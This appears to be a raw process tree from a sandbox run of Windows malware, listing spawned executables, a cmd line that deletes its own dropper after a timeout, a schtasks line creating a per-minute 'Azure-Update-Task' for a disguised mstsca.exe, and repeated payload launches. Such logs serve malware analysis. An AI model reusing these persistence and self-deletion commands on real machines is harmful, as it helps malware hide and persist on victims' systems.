C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E073.exe"2⤵PID:988
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3576
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {37D97406-2EB4-42E8-B648-BAA074E8D5F0} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:1492
-
C:\Users\Admin\AppData\Roaming\dbdahurC:\Users\Admin\AppData\Roaming\dbdahur2⤵PID:4088
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:3876
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:2328
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:972
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:3196
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8508
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:8656
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8812
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:9060
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:820
-
-
-
C:\Users\Admin\AppData\Roaming\dbdahurC:\Users\Admin\AppData\Roaming\dbdahur2⤵PID:9072
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:2992
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:3792
-
-
-
C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exeC:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exe --Task2⤵PID:3020
-
C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exeC:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exe --Task3⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:1804
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:9100
-
-
-
C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exeC:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exe --Task2⤵PID:8696
-
C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exeC:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exe --Task3⤵PID:7976
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:1580
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7504
-
-
-
C:\Users\Admin\AppData\Roaming\dbdahurC:\Users\Admin\AppData\Roaming\dbdahur2⤵PID:8480
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7904
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8592
-
-
-
C:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exeC:\Users\Admin\AppData\Local\e9d9ae5d-41ae-4b70-942b-aedd3d73db8b\7F6F.exe --Task2⤵PID:8348
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:8840
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3624
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A78C0FBACF27DBE9E1D4C013B6715299 C2⤵PID:2940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3125C7F5DFC9A72A032486B78DAAB75C2⤵PID:2040
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3680
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 24C0B2C22405A3F1F8DED017C185CA3D M Global\MSI00002⤵PID:584
-
-
C:\Users\Admin\AppData\Local\Temp\3DFE.exeC:\Users\Admin\AppData\Local\Temp\3DFE.exe1⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\AEBB.exeC:\Users\Admin\AppData\Local\Temp\AEBB.exe1⤵PID:3612
-
C:\Windows\system32\taskeng.exetaskeng.exe {A41AC667-079B-4BB8-B954-D8367A28677A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3948
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:3632
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:3860
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:1648
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:3836
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:4092
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:2188
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3340
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:8660
-